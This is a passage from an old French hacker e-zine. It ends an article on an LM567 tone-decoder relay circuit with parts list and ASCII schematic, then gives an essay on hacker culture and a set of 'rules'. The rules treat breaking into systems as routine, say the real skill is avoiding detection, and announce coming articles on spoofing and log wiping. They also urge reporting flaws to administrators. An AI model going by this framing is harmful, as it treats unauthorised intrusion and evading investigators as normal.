fonction du relais que je vais utiliser, ce qui permet avec la conception du circuit à
double faces (merci eagle), de disposer d'un montage à la taille extrêmement réduite. Par
contre si vous le souhaitez, vous pouvez préparer un circuit qui acceptera tous les types
de relais. On peut prévoir le remplacement du relais R11, par un relais bistable à deux
bobines (Siemens P1 ou D1), le relais R1 étant alors omis. Un cavalier alimentera alors la
seconde bobine. Le réglage se fait à l'aide d'un générateur AF, on injecte une tension, on
règle la fréquence par l'un des potentiomètres ajustables.

Bon je vous laisse à votre montage ;)

Nomenclature des composants :

Résistances 1/4 W 5% :
R1, R11, R21 : 82 Ohms

Condensateurs :
C1, C11, C21 : 22 nF MKT 5 mm
C2, C12, C22 : 0,33 uF tantale goutte 10 V
C3, C13, C23 : 0,68 uF tantale goutte 10 V
C4, C14, C24 : 2,2 uF tantale goutte 10 V
C5, C15, C25 : 10 nF MKT 5 mm

Semi-conducteurs :
CI1 : Circuit intégré LM, NE, XR 567
D1, D11, D21 : diode silicium 1N4148

Divers :
P1, P2, P11, P21 : potentiomètre ajustable vertical 47 KOhms
Re1, Re11, Re21 : relais type P1, D1 Siemens, Taiko NXE, Oucsh original
etc... Type monostable ou bistable à deux bobines
(Re11).

Tension suivant l'utilisation : 5 ou 12 V

Le schéma électrique :
---------------+-------+----------------------------------------------*
| |
| |
| | -----+--------------------------*
| | | Tension suivant
| | +-----+ Relais
| | | | |-----| +---------*
C3 __|__ | D1 _|_ +--| Re | |
13 _____0,68 | 11 /_\ | 1 | *__.______*
23 | uF | 8 21 | | 11 | *
| |-------|---------+--------| 21 | |
| 2| CL1 |5 |-----| +---------*
C1,11,21 +---| 11 21 |--------------+
| | 22 nF | 3| LM567 |6 |
+-| |------------|-------|----+ |-|/ P1, 11 ,21
| | | | 1| |7 | |/| 57 KOhms
-+ | C2,12| | | | /|-|
|P2 | 22 __|__ | | | |
| | | _____ | | | |-| R1, 11, 21
| |<-+ 0,33uF| | | | | | 82 KOhms
| | | | | | |-|
| | | | | |
| | | | +---------+
| |C4 |24 | |
| |14__|__ | __|__
| | _____ | _____ C5, 15 ,25
| 2,2 uF| | | 10 nF
-+----------------+----+----+----------------+--------------------------*



Bonne chance !!



#Brain.Override#

------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------


X] Qu'est-ce qu'un hacker ?

Pour les uns, un hacker est un génie de l'informatique, un créateur ; Pour les autres
c'est un assoifé de connaissances voulant en apprendre le plus possible sur les systèmes,
pour d'autres encore, c'est quelqu'un qui veut mesurer ses capacités à déjouer des
systèmes de protection, ou encore pour Zipiz, un trou du cul.

Je ne vous apporterai pas LA réponse (bien que je pense que zipiz est un peu à coté de la
plaque).

Le mot "hacker" a été créé il y a de nombreuses années, par tous ceux qui sont les
concepteurs de ce qui est aujourd'hui devenu Internet, c'est à dire les pionniers de
l'informatique qui ont colaborés à la construction d'Arpanet, qui ont créé le système UNIX
et qui l'on fait devenir ce qu'il est aujourd'hui... En fait l'essence même du Web, les
gens qui le font tourner sont des hackers. Et si ces mêmes personnes (non non pas Zipiz),
vous reconnaissent comme tel, alors vous êtes un hacker. On ne s'autoproclamme pas hacker.
C'est cette même communauté, par le respect qu'elle vous porte ou non qui déterminera si
vous êtes ou non un hacker.

Un hacker d'ailleurs, n'est pas forcémment un crack de la programmation. En fait c'est
l'état d'esprit, la capacité à apprendre et le déterminisme qui font d'un simple mortel
un hacker. Ainsi il peut y avoir des hackers dans l'électronique... ou autre chose.

C'est vrai que le hacker est parfois considéré comme une sorte d'autiste, car il ne fait
guère cas de ce qui est le plus important pour le reste du monde. Ce qui l'importe c'est
surtout de progresser dans son art. Le hacker développe toutes ces facultés à une vitesse
extraordinaire. S'il ne connait pas quelque chose il va développer sa faculté
d'aprentissage jusqu'à son paroxysme, afin de connaître par coeur le sujet qu'il
l'interesse. Un hacker n'abandonne jamais ! S'il a décidé de réalisé quelque chose, il le
fera jusqu'au bout. Et si c'est impossible (mot rayé du vocabulaire de base du hacker),
il trouvera un moyen équivalent ou se rapprochera le plus qu'il est possible de son but.
Quelqu'un qui n'a pas cette mentalité ne sera jamais un hacker, même s'il connait par
coeur toutes les bibles de programmation du monde...

Un hacker à aussi l'état d'esprit qui était celui des débuts d'Internet : Le partage de
l'information. Un hacker partage ses découvertes avec les autres afins que ceux-ci
puissent avancer plus vite et prends lui même les information que les autres ont trouvé,
qui pourrait l'aider dans ses recherches. Bien qui lui arrive de garder quelques petits
trucs secret, il en divuguera toujours l'essence pour que ceux qui sont à même de
comprendre puisse facilement découvrir des techniques équivalentes.

Les hackers défient également toute forme d'autorité : en effet une autorité quelconque,
peut se révéler un barage à sa créativité et sa soif de connaissance ce qui est tout à
fait inacceptable pour un hacker. C'est pour cela qu'on a souvent tendance à traiter les
hackers d'anarchistes.

Les hackers n'aiment donc pas les boeufs... Ceux qui bêtement suivent la masse ni ceux
d'ailleurs qui essaient de la contrôler. Il a une aversion pour tout ce qui est secret car
le secret est le plus grand des barages à la connaissance. Et quoi qu'il lui arrive il
restera sur cette position même si sa vie se trouve menacée.

Vous ne trouverez nulle part de bible qui vous expliquera comment devenir un hacker. Si
vous en êtes un ou en avez la trempe, vous le saurez en sentant cette exitation lorsque
vous inventez, lorsque les lignez de codes incompréhensible pour votre prof d'algo
défileront devant vous...

Installer un Unix libre tel Linux est un très bon début. Les codes sources étants fournis,
il vous sera facile d'étudier le fonctionnement des divers programmes afin d'améliorer
votre technique. Vous ne pourrez pas être un hacker sans comprendre le fonctionnement
d'unix car internet repose sur ces systèmes d'exploitation.

Enfin participer à l'evolution du mileu dit "underground" en apportant vos correctifs et
amélioration à des sources existant, vos propres créations, textes, opinions... Tout cela
est aussi une partie de la vie du hacker. Sachez aussi que vous devrez sacrifier beaucoup
de choses (vis à vis des autres) pour en arriver à ce niveau...

Si vous sentez un hacker qui sommeille en vous, si vous n'abandonnez jamais vos projets,
vos idéal alors lancez vous dans l'aventure... Vous ne le regretterez pas...


#Brain.Override#

------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------

XI] Les règles à respecter.


Quand on est un hacker (ou que l'on souhaite le devenir) il y a quelques règles de base à
respecter...

Ces quelques règles ont été rappelez mille fois et j'espère que d'autres penseront à le
faire assez régulièrement. Certains croient en effet que pénétrer un système
ultra-sécurisé fait de vous un des meilleurs hackers.. Or c'est totalement faux. Pénétrer
de gros systèmes n'est pas aussi compliqué qu'on veut vous le faire croire. Ainsi de
grandes institutions dont je ne citerai pas le nom, sont de véritables gruyères ! Non le
plus dur n'est pas de rentrer... c'est de ne pas se faire prendre !!!. Si on veut de la
renommée c'est facile vous vous attaquez ouvertement à un gros systèmes et un quart
d'heure après vous vous faites interpeler. Vous prenez un pseudo qui en jette genre
Brain Override, Dark Angel, Digital Squad ou encore illegal et vous passerez à la télé
pour un super génie, alors que vous n'êtes qu'une grosse BURNE !! Et oui tout l'art d'un
vrai hacker consiste à ne pas se faire détecter. Nous aborderons d'ailleurs ce problème
dans le C.H.G. 3 ou 4 où toutes les techniques d'occultation, spoofinganti-traçage,
effacement de ses traces dans les logs, etc... seront passés au crible.

Bon passons au reste. Vous ne devez en aucun cas, (sauf pour effacer vos traces) détruire
des données quel quelles soient sur le système que vous pénétrez. Traitez cette machine
comme la votre et laissez tout tel quel pour que les gars n'est pas à se retaper toutes
ses sauvegardes !!

Avertissez ensuite l'administrateur de le faille présente sur son système et mettez le
sur la voie pour qu'il puisse trouver ou fabriquer le correctif approprié. Certains ne
seront peut être pas très polis, pour ce qui est du reste, vous pouvez vous faire des amis
qui pourront un jour vous être utile.

Enfin lorsque vous trouvez une brèche, dans un programme ou un OS qui n'est pas connue,
avertissez la communauté! Il y a des listes de diffusion comme BUGTRAQ qui permettront de
mettre le maximum de gens au courant afin qu'un correctif soit le plus vite disponible.


#Brain.Override#


------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------

C'est ainsi que ce second numéro se termine. Pour le prochain mag, On va vous préparer
quelques exclusivités... assez spéciales.. Bon je tiens à remercier mon ami Digital
Squad qui va vous préparer quelques articles pour le prochain numéro, Ma copine, pour
sa patience et son aide quand je comprends plus mon propre code. Ah.. oui et mort aux
cons !!
------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------

"Consommer de la cafeine de facon abusive peut vous faire devenir l33T"
#PsYkAoS#

It's nice to be important, il's more important to be nice.
Hack The best, Fuck the rest !
#Maddchat#

l'expérience est comme une lanterne accroché dans le dos de quelqu'un
elle n'éclaire que le passé ;)
#GENOCYD#

"Un jour la France sera démocratique. On peut toujours
rêver..."

#peace&love#

"La chance accorde ses faveurs aux esprits avertis"
#Brain.Override#

"T'inquiete ça va marcher, fais moi confiance"
#Digital Squad"

"
Mort aux cons"
#Hagen#



← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT